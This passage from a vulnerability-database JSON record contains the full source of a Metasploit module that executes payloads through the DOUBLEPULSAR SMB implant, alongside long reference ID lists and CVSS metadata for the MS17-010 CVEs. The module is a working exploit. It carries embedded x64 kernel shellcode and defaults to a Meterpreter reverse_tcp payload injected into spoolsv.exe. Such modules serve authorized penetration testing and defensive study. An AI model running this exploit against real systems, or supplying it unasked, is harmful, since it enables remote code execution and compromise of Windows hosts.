"EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", 
"1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-16T22:32:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-16T22:32:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:32:51", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3edaa3a8fe8b6e270420745541bc95b9", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-20T20:22:59", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", 
"1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
